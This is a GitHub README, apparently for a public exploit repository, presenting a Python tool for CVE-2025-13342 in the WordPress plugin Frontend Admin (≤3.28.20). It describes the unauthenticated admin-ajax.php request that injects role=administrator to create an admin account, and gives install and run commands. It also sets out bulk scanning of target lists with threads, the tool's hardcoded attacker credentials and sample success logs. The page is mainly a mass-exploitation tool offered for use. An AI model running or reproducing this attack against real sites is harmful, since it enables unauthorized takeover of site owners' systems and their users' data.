Nxploited/CVE-2025-13342

GitHub: Nxploited/CVE-2025-13342

一款针对 Frontend Admin 插件未认证任意选项更新漏洞的自动化利用工具,可快速创建管理员账户以复现 CVE‑2025‑13342。

Stars: 0 | Forks: 0

# CVE-2025-13342 Frontend Admin by DynamiApps <= 3.28.20 - 未认证任意选项更新 # ⚡ CVE-2025-13342 ## Frontend Admin by DynamiApps — 未认证管理员创建 ``` __ __ _ _ _ ___ ,________ _ / ()(| |_// () / )/ \/ )|__ /| __/ __/| |/ ) | | | >- ----/| |/ \----| \ \|__|_/ \___/ \/ \___/ /__\_//__\__/ |\__/\__/ |/__ ``` [![CVE](https://img.shields.io/badge/CVE-2025--13342-critical?style=flat-square&color=CC0000)](https://www.cve.org/CVERecord?id=CVE-2025-13342) [![CVSS](https://img.shields.io/badge/CVSS%203.1-9.8%20CRITICAL-red?style=flat-square)](https://nvd.nist.gov/) [![Plugin](https://img.shields.io/badge/Frontend%20Admin%20%E2%89%A4%203.28.20-blueviolet?style=flat-square)](https://wordpress.org/plugins/frontend-admin/) [![Auth](https://img.shields.io/badge/Auth-None%20Required-brightgreen?style=flat-square)]() [![Python](https://img.shields.io/badge/Python-3.8%2B-3776AB?style=flat-square&logo=python&logoColor=white)]() ## ◈ 漏洞 | 字段 | 详情 | |---|---| | **CVE ID** | CVE-2025-13342 | | **分数** | **9.8 严重** — `CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H` | | **CNA** | Wordfence | | **受影响** | Frontend Admin by DynamiApps ≤ **3.28.20** | | **认证** | **无** — 完全未认证 | | **类型** | 权限检查不足 + 输入验证 → 任意选项写入 | | **CWE** | CWE-284 · 不当访问控制 | **发生情况:** `ActionOptions::run()` 的保存处理程序在写入 `wp_options` 前既不检查用户权限也不验证输入。一个公开的 ACF 前端表单就成为了开放的写入通道。攻击者设置 `users_can_register=1` 和 `default_role=administrator`,然后注册一个新账户即可自动获得管理员角色。 **此工具跳过两步流程** — 它直接提交经过构造的表单载荷,通过 `acff[user][field_*]` 将 `role=administrator` 注入用户创建字段,在一次 AJAX 调用中创建管理员账户。 ## ◈ 漏洞利用原理 ``` 1. Crawl common registration paths → locate ACF frontend form 2. Parse hidden fields → _acf_nonce, _acf_form 3. Map user fields → username · email · password · role 4. POST /wp-admin/admin-ajax.php action=frontend_admin/form_submit acff[user][] = administrator 5. {"success":true} → admin account created 6. Log to acf_success.txt ``` ## ◈ 要求 ``` requests beautifulsoup4 colorama rich ``` ``` pip install requests beautifulsoup4 colorama rich ``` ## ◈ 安装与运行 ``` git clone https://github.com/Nxploited/CVE-2025-13342.git cd CVE-2025-13342 pip install -r requirements.txt python3 CVE-2025-13342.py ``` ## ◈ 使用 该工具是交互式的。你将被询问四个问题: ``` Targets file path → list.txt Threads → 10 Timeout (seconds) → 10 Verbose debug → y / N ``` **凭证在内部固定:** | 字段 | 值 | |---|---| | 用户名 | `Nxadmin1` | | 邮箱 | `nxploitedtest@gmail.com` | | 密码 | `NxAdmin_1337#KSA` | ## ◈ 目标文件 每行一个主机 — 方案可选: ``` https://target1.com target2.com http://target3.com ``` ## ◈ 扫描的注册路径 该工具按顺序对每个目标探测 **28 个路径**,直到找到第一个有效的 ACF 表单为止: ``` / /register/ /registration/ /signup/ /sign-up/ /user-registration/ /account/ /my-account/ /frontend-form/ /frontend-register/ ... ``` ## ◈ 输出 | 文件 | 内容 | |---|---| | `acf_success.txt` | 确认成功的管理员创建记录 | **格式:** ``` [2025-06-01 14:30:22] BASE=https://target.com FORM=https://target.com/register/ USER=Nxadmin1 EMAIL=nxploitedtest@gmail.com PASS=NxAdmin_1337#KSA JSON={"success":true,...} ``` **终端:** ``` [+] Target base: https://target.com [+] Found form at: https://target.com/register/ _acf_nonce: a1b2c3d4e5 _acf_form: 123 [+] SUCCESS: https://target.com [-] No suitable ACF Frontend form found on ... [-] FAILED: https://target2.com ``` ## ◈ 联系 | | | |---|---| | **作者** | Nxploited (Khaled Alenazi) | | **GitHub** | [github.com/Nxploited](https://github.com/Nxploited) | | **Telegram** | [@KNxploited](https://t.me/KNxploited) | ## ◈ 免责声明
© 2025 Nxploited · Frontend Admin by DynamiApps ≤ 3.28.20 · Fixed in 3.28.21
标签:ACF前端表单, CRITICAL, CVE-2025-13342, CVSS 9.8, CWE-284, Frontend Admin, OpenVAS, PHP, SQL注入风险, Wordfence, WordPress插件, wp_options写, XSS, 任意选项更新, 前端管理, 动态应用, 未认证访问, 权限绕过, 漏洞情报, 用户注册漏洞, 管理员创建, 角色提升, 输入验证缺失, 逆向工具